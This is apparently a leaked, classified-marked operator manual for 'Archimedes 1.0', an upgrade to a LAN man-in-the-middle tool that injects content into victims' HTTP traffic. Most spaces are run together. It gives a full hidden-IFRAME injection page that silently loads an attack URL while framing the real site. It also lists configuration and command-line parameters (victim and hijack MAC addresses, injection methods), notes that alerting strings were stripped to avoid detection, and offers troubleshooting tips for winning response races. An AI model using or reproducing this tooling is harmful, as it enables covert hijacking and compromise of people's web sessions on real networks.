Escolar Documentos
Profissional Documentos
Cultura Documentos
(S)EngineeringDevelopmentGroup
(S)UMBRAGEPROJECT
(S)Archimedes1.0
(U)ToolDocumentation
(U)Rev.1.1
18-December-2012
SECRET//NOFORN
SECRET//NOFORN
(S//NF)Archimedes1.0makesthefollowingmodificationstotheFulcrumtool:
1. Supportdisablingtherouteverificationcheckthatoccurspriortoexploitation
2. AddsupportforanewHTTPinjectionmethodbasedonusingahiddenIFRAME
3. ModifytheDLLstosupporttheFireandForgetspecification(version2)
4. Provideamethodofgracefullyshuttingdownthetoolondemand
5. Removesthemostalertingstringsfromthereleasebinaries
FILEINFORMATION
(S)ThefollowingbinariesaredeliveredinArchimedes1.0.
SECRET//NOFORN
SECRET//NOFORN
(S//NF)Notethatthedeliveryincludesbothdebugandreleasebuildsofeachbinary.Thedebugbuildscontain
additionalinstrumentationthatcanbehelpfulinpinpointingerrorsandunexpectedbehaviorandwillgenerate
log information that can be used to trace the programs execution.Debugversionsshouldnotbedeployedona
machinethatwedonothavephysicalcontrolovertheadditionalinformationinthemmakesthesoftware
particularlyvulnerabletoreverseengineeringandanalysis.Debugversionsofthetoolshouldbeusedin
controlledtestenvironmentsonly.
(U)NEWOPTIONS
(S)ROUTEVERIFICATIONCHECK
(S//NF)Priortoperforming an injection attack, the original tool performs a Routing Verification step that would
oftenresultinahandlederrorthatcausedtheprogramtoterminate.Itisbelievedthatthefailuremaybecaused
bynetworkcardincompatibilityortheLANinfrastructure.Anexampleoftheerrorisshownbelow.
(S//NF)Archimedesaddstheoptiontodisablethischeckandcontinuewithnormaltooloperation.Testinghas
shownthatthiscanenableArchimedestosuccessfullyperformtheattackinenvironmentswherethetoolwould
previouslyerrorandexit.
(S//NF)Thisnewoptionisarequiredparameterintheconfigurationfileandisprovidedas:
VERIFY_ROUTE=TRUE
or
VERIFY_ROUTE=FALSE
(S//NF)ThevalueTRUEresultsintheoriginalroutingcheckbeingperformed.ThevalueFALSEdisablestherouting
check.
(S)INJECTIONMETHOD
(S//NF)TheINJECTION_METHODisspecifiedintheArchimedesconfigurationfile.Inadditiontothemethods
supported by Fulcrum 0.6.1, Archimedes adds support for the HIDDEN_IFRAME option. This method will
producethefollowingHTML:
<html>
<head>
<title></title>
<style type="text/css">
html, body
{
overflow: hidden;
margin: auto;
SECRET//NOFORN
SECRET//NOFORN
height: 100%;
width: 100%;
}
</style>
</head>
<body>
<iframe src="http://10.0.0.11/attack.html" frameborder="0" width="0" height="0">
</iframe>
<iframe src="http://10.0.0.11/?" frameborder="0" width="100%"
height="100%"></iframe>
</body>
</html>
(S//NF)TheattackURLwillbereplacedwiththatspecifiedbytheuserandthesecondURLwillredirecttheclient
totheoriginaltarget.Theresultisawebpagethatlooksliketheoriginaltarget.Itispossibletodetectthe
modificationbyexaminingthepagesource.
(C)FIREANDFORGETSUPPORT
(S//NF)TheArchimedesDLL(f32.dllorf64.dll)andArchimedesShutdownDLL(fs32.dll,fs64.dll)havebeen
modifiedtosupporttheFireandForget(F&F)specification(version2).InadditiontotheAPIchanges,thisrequires
anewwayoflocatingtheconfigurationfileanddefiningalocationforlogfilesandtemporaryfilescreatedbythe
program.
(S//NF)TheF&FDLLusesthetemporaryfolderassociatedwiththeinjectiontargetasalocationforthesefiles.
ThisfoldercanbeidentifiedastheTEMPenvironmentvariable.
(S//NF)TheF&Fspecificationprovidesforargumentpassing.Archimedesaddstwooptionalargumentsthatcanbe
usedtocontrolthebehaviorofthetoolinF&Fmode.Theseargumentsdefinethevaluestobeusedfor
VERIFY_ROUTEandINJECTION_METHOD.NotethatiftheINJECTION_METHODisspecified,thenitmustbe
precededbytheVERIFY_ROUTEoption.ThefollowingisanexamplecommandlinefortheF&FDLL:
[VICTIMMAC][HIJACKMAC][MILLISECONDS][URL][VERIFY_ROUTE] [INJECTION_METHOD]
(S//NF)VERIFY_ROUTEis(TRUEorFALSE)andINJECTION_METHODis(HIDDEN_IFRAMEorDOUBLE_FRAMEor
META_REFRESH).TheVERIFY_ROUTEparametercanbespecifiedwithouttheINJECTION_METHOD.
(S//NF)TheArchimedesDLLreturnstheappropriateerrorcodetoindicatethatitshouldnotbeunloadedfrom
memorybythecallingprocess.TheDLLwillunloadafterperformingasuccessfulattackagainstthetarget.Thelog
filecanbeusedtotracethebehavioroftheArchimedesprogram.
(S//NF)TheArchimedesShutdownDLLsignalstherunninginstanceofArchimedestogracefullyshutdown.Itcan
berunasaF&FDLLandreturnsanerrorcodeindicatingthatthecallingprocesscanunloadit.
(U)APPLICATIONDEFAULTS
(S//NF)ThemodificationsintroducedwithArchimedes1.0addnewcapabilities,butdonotchangethedefault
behavioroftheoriginaltool.
SECRET//NOFORN
SECRET//NOFORN
(U)TROUBLESHOOTING
(S//NF)ArchimedesandFulcrumonlyinjectintoHTTPrequeststhatreferencetherootofthedocumentdirectory.
Forexample,http://www.test.com/butnothttp://www.test.com/subdir/index.html.
(S//NF)ArchimedesreliesonitsresponsepacketbeatingtheresponsepacketfromtheHTTPserver.InLANtesting
environments,thisisdifficulttoachievewithoutartificiallyintroducinglatencybetweenthevictimandtheHTTP
server.
(S//NF) If the victims MAC address is not in the pivots cache, it will scan for the victim machinebeforeperforming
theinjection.Thiscantakeseveralminutes(orcanbeeliminatedbypingingthevictim).
SECRET//NOFORN